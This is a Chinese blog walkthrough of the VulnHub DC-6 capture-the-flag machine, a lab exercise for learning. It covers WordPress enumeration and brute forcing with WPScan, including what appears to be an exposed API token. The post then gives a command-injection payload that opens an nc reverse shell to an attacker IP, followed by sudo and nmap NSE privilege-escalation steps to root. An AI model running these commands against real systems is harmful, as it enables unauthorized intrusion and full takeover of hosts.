vulnhub之DC6靶机

最新推荐文章于 2024-04-20 17:38:48 发布
最新推荐文章于 2024-04-20 17:38:48 发布
阅读量537 收藏 1
点赞数
分类专栏: 靶机 文章标签: vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44288604/article/details/122926700
版权

目录

介绍

系列: DC(此系列共10台)
发布日期:2019 年 4 月 26 日
难度:初级-中级
Flag:获取root权限,并拿到唯一的flag
学习:
● wordpress 安全测试
● 本地代码执行
● nmap 提权

靶机地址:https://www.vulnhub.com/entry/dc-6,315/
提示信息:

  • 靶机支持Virtualbox和Vmware
  • 需要修改hosts文件,如:192.168.0.142 wordy
  • 可以通过如下方式获取密码本,提高测试速度:

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

信息收集

主机发现

arp-scan主机发现

arp-scan -I eth0 -l

在这里插入图片描述

主机信息探测

信息探测:nmap -A -p- 192.168.40.153,只开放了22和80端口
在这里插入图片描述

访问网站

首先修改hosts文件,打开之后看到是个WordPress站点
在这里插入图片描述

wpscan测试站点

  1. wpscan列出站点的用户名、账号。

发现了一些账号:admin、graham、mark、sarah、jens

wpscan --url http://wordy/ -e u --api-token se5dzb2kuZqWOYN3gK91L5asNOu1jNA0mdzDgSgndc8

在这里插入图片描述

  1. wpscan漏扫网站,没有发现有价值信息。
wpscan --url http://wordy/ -e vp --api-token se5dzb2kuZqWOYN3gK91L5asNOu1jNA0mdzDgSgndc8

在这里插入图片描述

  1. wpscan爆破网站

尝试根据得到的用户名,和靶场提示信息中说到的字典,对网站爆破,得到用户名:mark,密码:helpdesk01

准备密码字典:
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

准备用户名字典,就是测试出来的那5个用户

开始爆破:
wpscan --url http://wordy -P passwords.txt -U user.txt

在这里插入图片描述

登录站点

登录网站之后,经过简单的搜寻,发现了一个主机ping的测试站点。可以试试有没有经典的命令执行漏洞。最不济也能测试一下“Activity monitor”插件有没有漏洞。
在这里插入图片描述

输入框下面有两个按钮,经过测试,最后一个“Lookup”按钮可以造成命令执行效果
在这里插入图片描述

反弹shell

kali监听:nc -nvlp 9999
反弹命令:127.0.0.1 | nc -e /bin/bash 192.168.40.129 9999
获取交互式shell:python3 -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

信息收集

看到靶机上有4个用户,先去他们的家目录看看
在这里插入图片描述

发现敏感文件,身份切换到 graham 发现存在sudo提权的可能
在这里插入图片描述

提权

身份切换为 jens

思路:发现 graham 可以用 jens 的身份执行 /home/jens/backups.sh,把 /bin/bash追加到这个文件,然后用jens 的身份执行这个文件的时候就会打开一个具有 jens 权限的shell。

/home/jens/backups.sh得知:

  1. 先进入到对应路径:cd /home/jens
  2. /bin/bash追加到这个文件:echo '/bin/bash' >> backups.sh
  3. 切换身份:sudo -u jens ./backups.sh

身份切换之后,发现还可以继续 sudo 提权,提权还真是简单
在这里插入图片描述

提权至root

nmap 可以执行脚本文件,可以创建一个文件并写入反弹 shell 的命令:
echo 'os.execute("/bin/sh")' > rootshell.nse

以root的权限用nmap执行这个脚本:
sudo nmap --script=rootshell.nse

在这里插入图片描述

lainwith
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
DC靶场系列--DC1
BGiscool的博客
06-28 4856
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。DC1是vulnhub平台下的DC系列的第一个靶场,接下来我将会出DC系列的教程,有做的不对或者不完善之处,还请各位小伙伴们不吝指导。 ...
DC靶机系列:DC-6
Ays.Ie的博客
02-28 577
本篇文章为DC系列第6个靶机,该篇文章详细的记录了渗透的思路和整个渗透的过程,希望能够帮助到他人,同时加深自己的印象以及熟练自己的操作
DC6靶场渗透流程(超详细)
m0_64583632的博客
04-10 945
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
DC-6靶机攻略
真正的大师,永远都怀着一颗学徒的心。
08-01 1913
文章目录前言一、信息收集1,确定IP以及开放端口2,访问对方80端口3,登入对方后台二、反弹shell与提权1.得到SSH账号2.登陆对方SSH3,切换用户并提权 前言 DC-1靶机攻略 DC-2靶机攻略 DC-4靶机攻略 本篇将介绍DC-6的靶机攻略 一、信息收集 1,确定IP以及开放端口 2,访问对方80端口 这里和DC-2很像,直接输入IP无法访问80,需要配置etc/hosts文件 配置后成功进入目标网站,发现是由WordPress搭建。直接上WPscan WPScan是Kali Linu
DC-1渗透靶场实战速通版
saber的博客
12-01 888
开启 Kali 和 DC靶机,确保二者互相可以ping通,Kali地址根据命令可以查找到,但是DC靶机我们是没有画面的,只是开启了一个环境,我们可以在虚拟机的设置里面找到。得出新的admin的密码后,又开始重复步骤,登录数据库,使用数据库语句修改指定表指定字段中的值,修改密码为我们123456加密后的值。回到终端,退出数据库,使用命令查看提示文件。
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
DC-6靶机渗透测试详细教程
jennycisp的博客
12-14 1264
hosts定向wpscan枚举账号(因为是WordPress博客)wpscan账号密码爆破dirb目录扫描得到admin登录地址发现命令注入漏洞使用burp抓包修改数据反弹shell打开交互模式 python -c ‘import pty;进入到home目录查看DC-6的用户目录发现graham账号的密码,进行ssh登录成功使用sudo -l查看权限利用命令脚本转换到jens用户发现可执行root的文件为nmap创建一个nmap文件执行脚本只想nmap文件执行脚本获取到root。
DC-3靶场搭建及渗透实战详细过程(DC靶场系列)
金 帛的博客
07-27 5269
DC-3靶场渗透过程
Vulnhub靶机 DC-6 打靶实战 详细渗透测试过程
最新发布
rumil的博客
04-20 1022
查看sudo -l 下的内容,发现有jens用户权限执行的脚本,正是刚才我们刚才看见的shell脚本,接下来可以利用此,来反弹jens用户权限的shell。当前目录下无可利用的文件信息,查看家目录,发现有四个用户信息,逐一查看,发现在jens家目录和mark家目录下有文件信息,逐一查看。mark家目录下有一个文件夹,文件夹当中为一个txt文本文件,查看后发现graham用户的信息,尝试ssh远程登录到graham。发现可以正常的命令回显,那么接下来直接进行反弹shell,kali端开启监听。
DC-6靶机渗透详细流程
braty_的博客
01-28 491
wpscan --url http://wordy -U users.list -P /usr/share/wordlists/rockyou.txt //kali自带的字典。接着我们向里面追加写入一个shell的命令,发现现在的用户权限不够,待会再说。提权后是盲敲,光标没变化,,算了,编辑好在粘贴去找flag。发现访问不了,,记起来有重定向,要添加 hosts。哦吼,意外之喜,,发现了5个用户名。先看看 SUID:没啥有用的信息。文件,那我们直接先 su 过去。看回显,,果然存在。
看完这篇 教你玩转渗透测试靶机vulnhub——DC6
Aluxian_的博客
03-28 5324
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解:③:漏洞发现:④:漏洞利用:⑤:提权:⑤:提权: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC6,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https
DC-6的靶机渗透
m0_74950307的博客
10-27 121
pty.spawn("/bin/bash")' 命令的用途是在某些情况下改进当前终端的功能和体验。将使用 Bash shell 来执行其中的命令,也就是该脚本进去了虚拟终端,我们可以使用虚拟终端来控制它。9.获得了password和user的密码集,那么就可以进行爆破,可以使用burp也可以使用wpscan。dc靶机的网站:http://wordy/以及登录界面:http://wordy/wp-admin/".sh" 是Shell脚本文件的常见文件扩展名,它指示该文件是使用Shell编程语言编写的脚本。
DC-6靶机详细渗透过程
MRS_jianai的博客
12-21 791
DC-6靶机详细渗透过程
Neos的渗透测试靶机练习——DC-6
qq_38678845的博客
01-11 941
一次渗透测试练习
vulnhubdc6
qq_54030686的博客
06-14 853
DC系列第六篇,整体而言难度较低,此篇之后,不再进行较为细致的篇幅 总体逻辑:话不多说,开始干 主机发现,端口扫描 目标IP为192.168.43.140 开放两个端口22 和80 端口,其中80端口对应的服务为wordy,修改hosts文件,路径为/etc/hosts,添加值 22端口尝试进行爆破,采用用户名top50,字典使用弱口令top100进行尝试 未发现相应结果 进行指纹识别 发现为wordpress框架,使用wordpress专用扫描器进行检测,使用-e参数爆破用户 存在5个用户复制变异成字典
vulnhub靶机系列:
09-09
关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值